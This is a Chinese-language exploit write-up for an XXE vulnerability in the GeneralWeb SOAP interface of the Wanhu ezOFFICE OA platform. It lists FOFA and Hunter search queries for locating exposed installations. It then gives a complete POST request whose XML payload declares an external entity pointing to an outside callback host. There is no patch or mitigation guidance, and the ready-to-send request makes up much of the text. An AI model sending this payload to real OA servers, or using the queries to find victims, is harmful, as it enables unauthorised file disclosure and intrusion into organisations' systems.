万户协同办公平台GeneralWeb存在XXE漏洞
一、漏洞简介
万户OA系统接口GeneralWeb存在XXE漏洞,允许攻击者利用XML解析器处理外部实体,从而访问本地文件或进行其他恶意操作,可能导致敏感信息泄露和系统被攻击。
<font style="color:rgb(62, 62, 62);">二、影响版本</font>
- <font style="color:rgb(62, 62, 62);">万户ezoffice</font>
<font style="color:rgb(62, 62, 62);">三、资产测绘</font>
- <font style="color:rgb(62, 62, 62);">hunter</font>
<font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
- <font style="color:rgb(62, 62, 62);">fofa </font>
<font style="color:rgb(62, 62, 62);">app="万户ezOFFICE协同管理平台"</font>
- <font style="color:rgb(62, 62, 62);">登录页面</font>
<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 465
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
<soapenv:Body>
<gen:OAManager>
<gen:input>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY x SYSTEM "http://ydxacfqqwg.iyhc.eu.org">]>
<root>&x;</root>
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>